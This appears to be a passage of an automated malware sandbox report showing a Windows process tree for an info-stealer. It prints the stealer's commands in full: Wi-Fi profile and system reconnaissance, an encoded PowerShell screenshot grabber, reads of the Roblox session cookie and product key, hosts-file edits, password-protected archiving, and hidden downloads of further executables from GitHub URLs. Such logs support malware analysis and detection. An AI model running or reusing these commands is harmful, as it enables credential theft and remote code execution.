                                                                                                                        5⤵
                                                                                                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                        PID:5004
                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                          netsh wlan show profile
                                                                                                                          6⤵
                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                          PID:4052
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                        5⤵
                                                                                                                          PID:4684
                                                                                                                          • C:\Windows\system32\systeminfo.exe
                                                                                                                            systeminfo
                                                                                                                            6⤵
                                                                                                                            • Gathers system information
                                                                                                                            PID:2812
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                          5⤵
                                                                                                                            PID:1028
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                              6⤵
                                                                                                                                PID:2364
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                              5⤵
                                                                                                                                PID:3928
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                  6⤵
                                                                                                                                    PID:4760
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yyzyfsbp\yyzyfsbp.cmdline"
                                                                                                                                      7⤵
                                                                                                                                        PID:4984
                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D93.tmp" "c:\Users\Admin\AppData\Local\Temp\yyzyfsbp\CSCBA60A9BF3E334269AE71D3E744DDA49.TMP"
                                                                                                                                          8⤵
                                                                                                                                            PID:2616
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                      5⤵
                                                                                                                                        PID:4720
                                                                                                                                        • C:\Windows\system32\tree.com
                                                                                                                                          tree /A /F
                                                                                                                                          6⤵
                                                                                                                                            PID:780
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                          5⤵
                                                                                                                                            PID:3700
                                                                                                                                            • C:\Windows\system32\attrib.exe
                                                                                                                                              attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                              6⤵
                                                                                                                                              • Drops file in Drivers directory
                                                                                                                                              • Views/modifies file attributes
                                                                                                                                              PID:1576
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                            5⤵
                                                                                                                                              PID:1028
                                                                                                                                              • C:\Windows\system32\tree.com
                                                                                                                                                tree /A /F
                                                                                                                                                6⤵
                                                                                                                                                  PID:3400
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                5⤵
                                                                                                                                                  PID:4084
                                                                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                                                                    attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                    6⤵
                                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                    PID:180
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                  5⤵
                                                                                                                                                    PID:2952
                                                                                                                                                    • C:\Windows\system32\tree.com
                                                                                                                                                      tree /A /F
                                                                                                                                                      6⤵
                                                                                                                                                        PID:1436
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                      5⤵
                                                                                                                                                        PID:4768
                                                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                                                          tasklist /FO LIST
                                                                                                                                                          6⤵
                                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                                          PID:660
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                        5⤵
                                                                                                                                                          PID:1028
                                                                                                                                                          • C:\Windows\system32\tree.com
                                                                                                                                                            tree /A /F
                                                                                                                                                            6⤵
                                                                                                                                                              PID:2696
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                            5⤵
                                                                                                                                                              PID:2072
                                                                                                                                                              • C:\Windows\system32\tree.com
                                                                                                                                                                tree /A /F
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:1288
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:4720
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:2756
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:3492
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:3820
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:3544
                                                                                                                                                                        • C:\Windows\system32\getmac.exe
                                                                                                                                                                          getmac
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:1384
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI11042\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\5NVCT.zip" *"
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:3260
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI11042\rar.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\_MEI11042\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\5NVCT.zip" *
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:5084
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:660
                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:4768
                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                  wmic os get Caption
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:5056
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:4340
                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                      wmic computersystem get totalphysicalmemory
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:2456
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:4132
                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:2364
                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                            wmic csproduct get uuid
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:3024
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:2340
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                PID:1740
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:2756
                                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                  wmic path win32_VideoController get name
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Detects videocard installed
                                                                                                                                                                                                  PID:3700
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:3668
                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:3232
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\in.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\in.exe"
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:212
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7044.tmp\7045.tmp\7046.bat C:\Users\Admin\AppData\Local\Temp\a\in.exe"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:3176
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/arht/releases/download/seht/archive.htm/' -outfile archive.htm"
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                      PID:4020
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/ucm1/releases/download/iu1/shost.exe/' -outfile shost.exe"
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                      PID:4540
                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\archive.htm
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:2756
                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffba52d46f8,0x7ffba52d4708,0x7ffba52d4718
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:432
                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,6019310059713205989,13506666900689336963,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2012 /prefetch:2
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:3952
                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,6019310059713205989,13506666900689336963,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 /prefetch:3
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:2620
                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2000,6019310059713205989,13506666900689336963,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2996 /prefetch:8
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:1880
                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,6019310059713205989,13506666900689336963,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
                                                                                                                                                                                                                  6⤵
